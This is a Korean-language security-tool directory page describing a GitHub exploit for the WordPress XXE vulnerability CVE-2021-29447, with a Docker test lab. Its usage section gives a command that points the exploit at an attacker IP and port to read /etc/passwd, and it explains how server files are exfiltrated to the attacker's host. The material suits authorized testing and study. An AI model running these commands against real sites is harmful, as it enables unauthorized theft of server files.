Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-29447 — # CVE-2021-29447 익스플로잇 WordPress 5.7.0 및 이전 버전의 XXE 취약점인 CVE-2021-29447에 대한 익스플로잇입니다. XML 외부 엔티티 주입을 통해 임의의 서버 파일을 읽기 위한 악성 WAV 페이로드를 생성합니다. Docker 테스트 환경이 포함되어 있습니다. | Kitploit
도구/GitHubGitHub/danilo1992-sys/cve-2021-29447
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubdanilo1992-sys/cve-2021-29447

CVE-2021-29447

# CVE-2021-29447 익스플로잇 WordPress 5.7.0 및 이전 버전의 XXE 취약점인 CVE-2021-29447에 대한 익스플로잇입니다. XML 외부 엔티티 주입을 통해 임의의 서버 파일을 읽기 위한 악성 WAV 페이로드를 생성합니다. Docker 테스트 환경이 포함되어 있습니다.

저장소 보기
15개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-29447 - WordPress XXE 취약점 익스플로잇

설명

이 저장소는 CVE-2021-29447에 대한 익스플로잇을 포함하고 있습니다. 이 취약점은 WordPress 5.7.0 및 이전 버전에 존재하는 XXE(XML External Entity) 취약점입니다. 이 취약점은 WAV 파일을 처리하는 미디어 라이브러리에 존재하며, 공격자가 서버에서 임의의 파일을 읽을 수 있게 합니다.

요구 사항

  • Bash
  • Python 3
  • Docker 및 Docker Compose (테스트 환경 구축용)
  • 취약한 WordPress 서버 (5.7.0 이하)

파일

파일설명
CVE-2021-29447.shWAV 페이로드 및 악성 DTD 파일을 생성하는 익스플로잇 스크립트
decode.php유출된 데이터를 디코딩하는 PHP 스크립트 (base64 + zlib)
docker-compose.yml테스트용 취약한 WordPress Docker 환경

사용법

1. 테스트 환경 구축

root@kitploit:~
docker-compose up -d

2. 익스플로잇 실행

root@kitploit:~
chmod +x CVE-2021-29447.sh
./CVE-2021-29447.sh -l <LHOST> -p <LPORT> -f <archivo_objetivo>

매개변수:

  • -l 공격자 IP (LHOST)
  • -p 공격자 포트 (LPORT)
  • -f 서버에서 읽을 파일 경로
  • -h 도움말 표시

예시:

root@kitploit:~
./CVE-2021-29447.sh -l 192.168.1.100 -p 4444 -f /etc/passwd

3. 데이터 디코딩

유출된 데이터는 base64로 인코딩되고 zlib으로 압축됩니다. 이를 디코딩하려면:

root@kitploit:~
php decode.php

기술

이 익스플로잇은 WAV 파일의 메타데이터에 XXE 외부 엔티티를 삽입하는 방식으로 작동합니다. WordPress가 파일을 처리할 때 XML 파서가 외부 엔티티를 해석하여 서버가 파일 내용을 URL로 인코딩하여 공격자 서버에 HTTP 요청을 보내게 합니다.

참고 자료

  • CVE-2021-29447
  • WordPress 5.7.0 Security Release

경고

이 코드는 교육 목적 및 승인된 침투 테스트 전용입니다. 명시적 허가 없이 시스템에 사용하지 마십시오.

도구 다운로드